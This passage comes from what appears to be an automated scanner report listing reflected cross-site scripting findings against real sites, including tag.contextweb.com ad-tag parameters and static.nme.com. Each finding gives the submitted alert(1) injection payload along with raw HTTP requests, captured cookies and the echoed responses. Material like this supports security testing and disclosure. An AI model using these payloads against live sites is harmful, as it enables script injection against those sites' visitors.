Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: rsi_segs=D08734_70008|D08734_72078; GCIONSN=AAAAOn52dzoxfnVidDox; s_cc=true; s_sq=%5B%5BB%5D%5D; gban=inter%3Ddisabled%3Atrue%2Cviews%3A1%2Cexpiry%3A16H%2Cplacementid%3A1273145%2Cpreload%3Afalse%2Cid%3Ainter%2Ccontrolurl%3Ahttp%253A//gannett.gcion.com/addyn/3.0/5111.1/1273144/0/0/ADTECH%253Balias%253Dfl-brevard.flatoday.com/news/article.htm_Interstitial%253Bcookie%253Dinfo%253Bloc%253D100%253Btarget%253D_blank%253Bgrp%253D24711%253Bmisc%253D1304949586599%253Bsize%253D0%253Bnoperf%253D1%2Cexpires%3A1305007188; digtriadprod=R4278572220

Response

HTTP/1.1 200 OK
Set-Cookie: digtriadprod=R4278572220; path=/
Cache-Control: public, must-revalidate
Content-Type: application/x-javascript; charset=utf-8
Expires: Mon, 09 May 2011 14:01:18 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
x-SiteLife-host: l3vm210l3pluckcom
Set-Cookie: SiteLifeHost=l3vm210l3pluckcom; domain=floridatoday.com; path=/
Set-Cookie: anonId=23ef99e6-27a2-49a5-8051-e7ec0f9a803b; domain=floridatoday.com; expires=Tue, 08-May-2012 14:01:18 GMT; path=/
Date: Mon, 09 May 2011 14:01:18 GMT
Content-Length: 3076

PluckSDKjpcb({
"Envelopes": [
{
"PayloadType": "Responses.External.ArticleResponse",
"Payload": "{\r\n \"Article\": {\r\n \"ArticleKey\": {\r\n \"Key\": \"20110508.flori
...[SNIP]...
al.ArticleResponse\",\r\n \"ResponseStatus\": {\r\n \"StatusCode\": \"OK\",\r\n \"Exceptions\": [],\r\n \"ObjectType\": \"Models.System.ResponseStatus\"\r\n }\r\n}"
}
]
},'request_081cf3<script>alert(1)</script>472e56e0cef');

3.71. http://static.nme.com/themes/default/static_images//themes/default/images/footer_bkgrd.gif [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://static.nme.com
Path:   /themes/default/static_images//themes/default/images/footer_bkgrd.gif

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload 16820-->8bd07968a3a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to can close the open HTML comment and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /themes16820-->8bd07968a3a/default/static_images//themes/default/images/footer_bkgrd.gif HTTP/1.1
Host: static.nme.com
Proxy-Connection: keep-alive
Referer: http://www.nme.com/news/sufjan-stevens/56527
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=29jkomkf8kicpicajt2rkq4nq6; ignite_loggedin=false; browsertype=web; s_cc=true; s_sq=%5B%5BB%5D%5D; __utmz=112756251.1304949643.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=112756251.356327229.1304949643.1304949643.1304949643.1; __utmc=112756251; __utmb=112756251.2.10.1304949643; rsi_segs=

Response

HTTP/1.1 404 Not Found
Server: Apache
Pragma: no-cache
NmeAkamaiMatch: 1
IgniteAkamaiMatch: 1
X-Wf-Protocol-1: http://meta.wildfirehq.org/Protocol/JsonStream/0.2
X-Wf-1-Plugin-1: http://meta.firephp.org/Wildfire/Plugin/FirePHP/Library-FirePHPCore/0.3
X-Wf-1-Structure-1: http://meta.firephp.org/Wildfire/Structure/FirePHP/FirebugConsole/0.1
X-Wf-1-1-1-1: 55|[{"Type":"LOG"},"now: Mon, 09 May 2011 15:03:14 +0100"]|
X-Wf-1-1-1-2: 63|[{"Type":"LOG"},"id: 5eeb5799cec8cc65da155e0eb1098290cdcddc27"]|
X-Wf-1-1-1-3: 23|[{"Type":"LOG"},"li: "]|
X-Wf-1-1-1-4: 24|[{"Type":"LOG"},"cs: 1"]|
X-Wf-1-1-1-5: 23|[{"Type":"LOG"},"rc: "]|
X-Wf-1-1-1-6: 23|[{"Type":"LOG"},"ic: "]|
X-Wf-1-1-1-7: 28|[{"Type":"LOG"},"ttl: 3760"]|
X-Wf-1-1-1-8: 30|[{"Type":"LOG"},"mu: 4456448"]|
X-Wf-1-1-1-9: 38|[{"Type":"LOG"},"ts: 0.1827130317688"]|
X-Wf-1-1-1-10: 23|[{"Type":"LOG"},"ct: "]|
Content-Type: text/html
Cache-Control: must-revalidate, max-age=2591999, post-check=0, pre-check=0
Expires: Wed, 08 Jun 2011 14:03:14 GMT
Date: Mon, 09 May 2011 14:03:15 GMT
Connection: close
Vary: Accept-Encoding
Connection: Transfer-Encoding
Content-Length: 38325

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head>

<title>NME.COM<
...[SNIP]...
<!-- error: EXCEPTION_NO_CONTROLLER - Invalid controller specified (themes16820-->8bd07968a3a) -->
...[SNIP]...

3.72. http://tag.contextweb.com/TagPublish/getjs.aspx [action parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://tag.contextweb.com
Path:   /TagPublish/getjs.aspx

Issue detail

The value of the action request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9e4eb"%3balert(1)//5e3e6b7f4d2 was submitted in the action parameter. This input was echoed as 9e4eb";alert(1)//5e3e6b7f4d2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /TagPublish/getjs.aspx?action=VIEWAD9e4eb"%3balert(1)//5e3e6b7f4d2&cwrun=200&cwadformat=728X90&cwpid=536156&cwwidth=728&cwheight=90&cwpnet=1&cwtagid=101378 HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2W4=3bZ_cGKSaikCutesUynzUXb59QbtOHa7Nv35a38qe_dW_2SdvoXWHsQ; pb_rtb_ev=1:535495.0c2aede6-6bb6-11e0-8fe6-0025900a8ffe.1|530739.4dab7d35-b1d2-915a-d3c0-9d57f9c66b07.0|535039.9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC.0|535461.2931142961646634775.1; cr=2|1|-8588966416881931568|1; FC1-WC=^53620_1_2QLwy; V=wOebwAz4UvVv; cwbh1=541%3B05%2F24%2F2011%3BLIFL1%0A1697%3B05%2F24%2F2011%3BFCRT1%0A2354%3B05%2F24%2F2011%3BZETC1%0A2532%3B05%2F26%2F2011%3BAMQU2%0A1443%3B05%2F30%2F2011%3BNETM7%0A2250%3B06%2F06%2F2011%3BEXPD1

Response

HTTP/1.1 200 OK
Server: GlassFish v3
CW-Server: CW-APP118
Cache-Control: max-age=10000, public, must-revalidate
Last-Modified: Fri, 06 May 02011 16:58:30 EDT
Content-Type: application/x-javascript;charset=ISO-8859-1
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Content-Length: 5918
Date: Mon, 09 May 2011 14:00:11 GMT
Connection: close
Set-Cookie: cw=cw; Domain=.contextweb.com; Expires=Mon, 09-May-2011 16:46:51 GMT; Path=/

function cw_Process(){try{var cu="http://tag.contextweb.com/TagPublish/GetAd.aspx";var cwpid="536156";var cwtagid="101378";var cwadformat="728X90";var ca="VIEWAD9e4eb";alert(1)//5e3e6b7f4d2";var cr="200";var cw="728";var ch="90";var cads="0";var cp="536156";var ct="101378";var cf="728X90";var cn="1";String.prototype.cwcontains=function(s){return(this.toLowerCase().indexOf(s.toLowerCase()
...[SNIP]...

3.73. http://tag.contextweb.com/TagPublish/getjs.aspx [cwadformat parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://tag.contextweb.com
Path:   /TagPublish/getjs.aspx

Issue detail

The value of the cwadformat request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ff8b7"%3balert(1)//c29357cb3b5 was submitted in the cwadformat parameter. This input was echoed as ff8b7";alert(1)//c29357cb3b5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /TagPublish/getjs.aspx?action=VIEWAD&cwrun=200&cwadformat=728X90ff8b7"%3balert(1)//c29357cb3b5&cwpid=536156&cwwidth=728&cwheight=90&cwpnet=1&cwtagid=101378 HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2W4=3bZ_cGKSaikCutesUynzUXb59QbtOHa7Nv35a38qe_dW_2SdvoXWHsQ; pb_rtb_ev=1:535495.0c2aede6-6bb6-11e0-8fe6-0025900a8ffe.1|530739.4dab7d35-b1d2-915a-d3c0-9d57f9c66b07.0|535039.9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC.0|535461.2931142961646634775.1; cr=2|1|-8588966416881931568|1; FC1-WC=^53620_1_2QLwy; V=wOebwAz4UvVv; cwbh1=541%3B05%2F24%2F2011%3BLIFL1%0A1697%3B05%2F24%2F2011%3BFCRT1%0A2354%3B05%2F24%2F2011%3BZETC1%0A2532%3B05%2F26%2F2011%3BAMQU2%0A1443%3B05%2F30%2F2011%3BNETM7%0A2250%3B06%2F06%2F2011%3BEXPD1

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
X-Powered-By: ASP.NET
CW-Server: CW-WEB26
Cache-Control: public, must-revalidate, max-age=1000
Last-Modified: Wed, 04 May 2011 15:16:23 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 5832
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Date: Mon, 09 May 2011 14:00:14 GMT
Connection: close
Set-Cookie: cw=cw; domain=.contextweb.com; path=/

function cw_Process(){try{var cu="http://tag.contextweb.com/TagPublish/getad.aspx";var cp="536156";var ct="101378";var cf="728X90ff8b7";alert(1)//c29357cb3b5";var ca="VIEWAD";var cr="200";var cw="728";var ch="90";var cn="1";var cads="0";String.prototype.cwcontains=function(s){return(this.toLowerCase().indexOf(s.toLowerCase())!= -1);};var _nxy=[-1,-1];var _
...[SNIP]...

3.74. http://tag.contextweb.com/TagPublish/getjs.aspx [cwheight parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://tag.contextweb.com
Path:   /TagPublish/getjs.aspx

Issue detail

The value of the cwheight request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e3593"%3balert(1)//afb37673b17 was submitted in the cwheight parameter. This input was echoed as e3593";alert(1)//afb37673b17 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /TagPublish/getjs.aspx?action=VIEWAD&cwrun=200&cwadformat=728X90&cwpid=536156&cwwidth=728&cwheight=90e3593"%3balert(1)//afb37673b17&cwpnet=1&cwtagid=101378 HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2W4=3bZ_cGKSaikCutesUynzUXb59QbtOHa7Nv35a38qe_dW_2SdvoXWHsQ; pb_rtb_ev=1:535495.0c2aede6-6bb6-11e0-8fe6-0025900a8ffe.1|530739.4dab7d35-b1d2-915a-d3c0-9d57f9c66b07.0|535039.9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC.0|535461.2931142961646634775.1; cr=2|1|-8588966416881931568|1; FC1-WC=^53620_1_2QLwy; V=wOebwAz4UvVv; cwbh1=541%3B05%2F24%2F2011%3BLIFL1%0A1697%3B05%2F24%2F2011%3BFCRT1%0A2354%3B05%2F24%2F2011%3BZETC1%0A2532%3B05%2F26%2F2011%3BAMQU2%0A1443%3B05%2F30%2F2011%3BNETM7%0A2250%3B06%2F06%2F2011%3BEXPD1

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
X-Powered-By: ASP.NET
CW-Server: CW-WEB24
Cache-Control: public, must-revalidate, max-age=1000
Last-Modified: Wed, 04 May 2011 15:16:23 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 5832
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Date: Mon, 09 May 2011 14:00:15 GMT
Connection: close
Set-Cookie: cw=cw; domain=.contextweb.com; path=/

function cw_Process(){try{var cu="http://tag.contextweb.com/TagPublish/getad.aspx";var cp="536156";var ct="101378";var cf="728X90";var ca="VIEWAD";var cr="200";var cw="728";var ch="90e3593";alert(1)//afb37673b17";var cn="1";var cads="0";String.prototype.cwcontains=function(s){return(this.toLowerCase().indexOf(s.toLowerCase())!= -1);};var _nxy=[-1,-1];var _cwd=document;var _cww=window;var _cwu="undefined";var
...[SNIP]...

3.75. http://tag.contextweb.com/TagPublish/getjs.aspx [cwpid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://tag.contextweb.com
Path:   /TagPublish/getjs.aspx

Issue detail

The value of the cwpid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d35e5"%3balert(1)//a722bf372ca was submitted in the cwpid parameter. This input was echoed as d35e5";alert(1)//a722bf372ca in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /TagPublish/getjs.aspx?action=VIEWAD&cwrun=200&cwadformat=728X90&cwpid=536156d35e5"%3balert(1)//a722bf372ca&cwwidth=728&cwheight=90&cwpnet=1&cwtagid=101378 HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2W4=3bZ_cGKSaikCutesUynzUXb59QbtOHa7Nv35a38qe_dW_2SdvoXWHsQ; pb_rtb_ev=1:535495.0c2aede6-6bb6-11e0-8fe6-0025900a8ffe.1|530739.4dab7d35-b1d2-915a-d3c0-9d57f9c66b07.0|535039.9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC.0|535461.2931142961646634775.1; cr=2|1|-8588966416881931568|1; FC1-WC=^53620_1_2QLwy; V=wOebwAz4UvVv; cwbh1=541%3B05%2F24%2F2011%3BLIFL1%0A1697%3B05%2F24%2F2011%3BFCRT1%0A2354%3B05%2F24%2F2011%3BZETC1%0A2532%3B05%2F26%2F2011%3BAMQU2%0A1443%3B05%2F30%2F2011%3BNETM7%0A2250%3B06%2F06%2F2011%3BEXPD1

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
X-Powered-By: ASP.NET
CW-Server: CW-WEB26
Cache-Control: public, must-revalidate, max-age=1000
Last-Modified: Wed, 04 May 2011 15:16:23 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 5832
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Date: Mon, 09 May 2011 14:00:14 GMT
Connection: close
Set-Cookie: cw=cw; domain=.contextweb.com; path=/

function cw_Process(){try{var cu="http://tag.contextweb.com/TagPublish/getad.aspx";var cp="536156d35e5";alert(1)//a722bf372ca";var ct="101378";var cf="728X90";var ca="VIEWAD";var cr="200";var cw="728";var ch="90";var cn="1";var cads="0";String.prototype.cwcontains=function(s){return(this.toLowerCase().indexOf(s.toLowerCase()
...[SNIP]...

3.76. http://tag.contextweb.com/TagPublish/getjs.aspx [cwpnet parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://tag.contextweb.com
Path:   /TagPublish/getjs.aspx

Issue detail

The value of the cwpnet request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2f670"%3balert(1)//bf6a463a257 was submitted in the cwpnet parameter. This input was echoed as 2f670";alert(1)//bf6a463a257 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /TagPublish/getjs.aspx?action=VIEWAD&cwrun=200&cwadformat=728X90&cwpid=536156&cwwidth=728&cwheight=90&cwpnet=12f670"%3balert(1)//bf6a463a257&cwtagid=101378 HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2W4=3bZ_cGKSaikCutesUynzUXb59QbtOHa7Nv35a38qe_dW_2SdvoXWHsQ; pb_rtb_ev=1:535495.0c2aede6-6bb6-11e0-8fe6-0025900a8ffe.1|530739.4dab7d35-b1d2-915a-d3c0-9d57f9c66b07.0|535039.9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC.0|535461.2931142961646634775.1; cr=2|1|-8588966416881931568|1; FC1-WC=^53620_1_2QLwy; V=wOebwAz4UvVv; cwbh1=541%3B05%2F24%2F2011%3BLIFL1%0A1697%3B05%2F24%2F2011%3BFCRT1%0A2354%3B05%2F24%2F2011%3BZETC1%0A2532%3B05%2F26%2F2011%3BAMQU2%0A1443%3B05%2F30%2F2011%3BNETM7%0A2250%3B06%2F06%2F2011%3BEXPD1

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
X-Powered-By: ASP.NET
CW-Server: CW-WEB27
Cache-Control: public, must-revalidate, max-age=1000
Last-Modified: Wed, 04 May 2011 15:16:23 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 5832
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Date: Mon, 09 May 2011 14:00:15 GMT
Connection: close
Set-Cookie: cw=cw; domain=.contextweb.com; path=/

function cw_Process(){try{var cu="http://tag.contextweb.com/TagPublish/getad.aspx";var cp="536156";var ct="101378";var cf="728X90";var ca="VIEWAD";var cr="200";var cw="728";var ch="90";var cn="12f670";alert(1)//bf6a463a257";var cads="0";String.prototype.cwcontains=function(s){return(this.toLowerCase().indexOf(s.toLowerCase())!= -1);};var _nxy=[-1,-1];var _cwd=document;var _cww=window;var _cwu="undefined";var _cwn=naviga
...[SNIP]...

3.77. http://tag.contextweb.com/TagPublish/getjs.aspx [cwrun parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://tag.contextweb.com
Path:   /TagPublish/getjs.aspx

Issue detail

The value of the cwrun request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e83ac"%3balert(1)//31573316bfa was submitted in the cwrun parameter. This input was echoed as e83ac";alert(1)//31573316bfa in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /TagPublish/getjs.aspx?action=VIEWAD&cwrun=200e83ac"%3balert(1)//31573316bfa&cwadformat=728X90&cwpid=536156&cwwidth=728&cwheight=90&cwpnet=1&cwtagid=101378 HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2W4=3bZ_cGKSaikCutesUynzUXb59QbtOHa7Nv35a38qe_dW_2SdvoXWHsQ; pb_rtb_ev=1:535495.0c2aede6-6bb6-11e0-8fe6-0025900a8ffe.1|530739.4dab7d35-b1d2-915a-d3c0-9d57f9c66b07.0|535039.9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC.0|535461.2931142961646634775.1; cr=2|1|-8588966416881931568|1; FC1-WC=^53620_1_2QLwy; V=wOebwAz4UvVv; cwbh1=541%3B05%2F24%2F2011%3BLIFL1%0A1697%3B05%2F24%2F2011%3BFCRT1%0A2354%3B05%2F24%2F2011%3BZETC1%0A2532%3B05%2F26%2F2011%3BAMQU2%0A1443%3B05%2F30%2F2011%3BNETM7%0A2250%3B06%2F06%2F2011%3BEXPD1

Response

HTTP/1.1 200 OK
X-Powered-By: Servlet/3.0
Server: GlassFish v3
CW-Server: CW-APP203
Cache-Control: max-age=10000, public, must-revalidate
Last-Modified: Fri, 06 May 02011 17:06:12 EDT
Content-Type: application/x-javascript;charset=ISO-8859-1
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Content-Length: 5918
Date: Mon, 09 May 2011 14:00:14 GMT
Connection: close
Set-Cookie: cw=cw; Domain=.contextweb.com; Expires=Mon, 09-May-2011 16:46:54 GMT; Path=/

function cw_Process(){try{var cu="http://tag.contextweb.com/TagPublish/GetAd.aspx";var cwpid="536156";var cwtagid="101378";var cwadformat="728X90";var ca="VIEWAD";var cr="200e83ac";alert(1)//31573316bfa";var cw="728";var ch="90";var cads="0";var cp="536156";var ct="101378";var cf="728X90";var cn="1";String.prototype.cwcontains=function(s){return(this.toLowerCase().indexOf(s.toLowerCase())!= -1);};var
...[SNIP]...

3.78. http://tag.contextweb.com/TagPublish/getjs.aspx [cwtagid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://tag.contextweb.com
Path:   /TagPublish/getjs.aspx

Issue detail

The value of the cwtagid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 65341"%3balert(1)//c8426144146 was submitted in the cwtagid parameter. This input was echoed as 65341";alert(1)//c8426144146 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /TagPublish/getjs.aspx?action=VIEWAD&cwrun=200&cwadformat=728X90&cwpid=536156&cwwidth=728&cwheight=90&cwpnet=1&cwtagid=10137865341"%3balert(1)//c8426144146 HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2W4=3bZ_cGKSaikCutesUynzUXb59QbtOHa7Nv35a38qe_dW_2SdvoXWHsQ; pb_rtb_ev=1:535495.0c2aede6-6bb6-11e0-8fe6-0025900a8ffe.1|530739.4dab7d35-b1d2-915a-d3c0-9d57f9c66b07.0|535039.9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC.0|535461.2931142961646634775.1; cr=2|1|-8588966416881931568|1; FC1-WC=^53620_1_2QLwy; V=wOebwAz4UvVv; cwbh1=541%3B05%2F24%2F2011%3BLIFL1%0A1697%3B05%2F24%2F2011%3BFCRT1%0A2354%3B05%2F24%2F2011%3BZETC1%0A2532%3B05%2F26%2F2011%3BAMQU2%0A1443%3B05%2F30%2F2011%3BNETM7%0A2250%3B06%2F06%2F2011%3BEXPD1

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
CW-Server: CW-WEB20
Cache-Control: public, must-revalidate, max-age=1000
Last-Modified: Wed, 04 May 2011 15:16:23 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 5832
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Date: Mon, 09 May 2011 14:00:15 GMT
Connection: close
Set-Cookie: cw=cw; domain=.contextweb.com; path=/

function cw_Process(){try{var cu="http://tag.contextweb.com/TagPublish/getad.aspx";var cp="536156";var ct="10137865341";alert(1)//c8426144146";var cf="728X90";var ca="VIEWAD";var cr="200";var cw="728";var ch="90";var cn="1";var cads="0";String.prototype.cwcontains=function(s){return(this.toLowerCase().indexOf(s.toLowerCase())!= -1);};var _n
...[SNIP]...

3.79. http://tag.contextweb.com/TagPublish/getjs.aspx [cwwidth parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://tag.contextweb.com
Path:   /TagPublish/getjs.aspx

Issue detail

The value of the cwwidth request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5e2be"%3balert(1)//bd79ae61eda was submitted in the cwwidth parameter. This input was echoed as 5e2be";alert(1)//bd79ae61eda in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /TagPublish/getjs.aspx?action=VIEWAD&cwrun=200&cwadformat=728X90&cwpid=536156&cwwidth=7285e2be"%3balert(1)//bd79ae61eda&cwheight=90&cwpnet=1&cwtagid=101378 HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
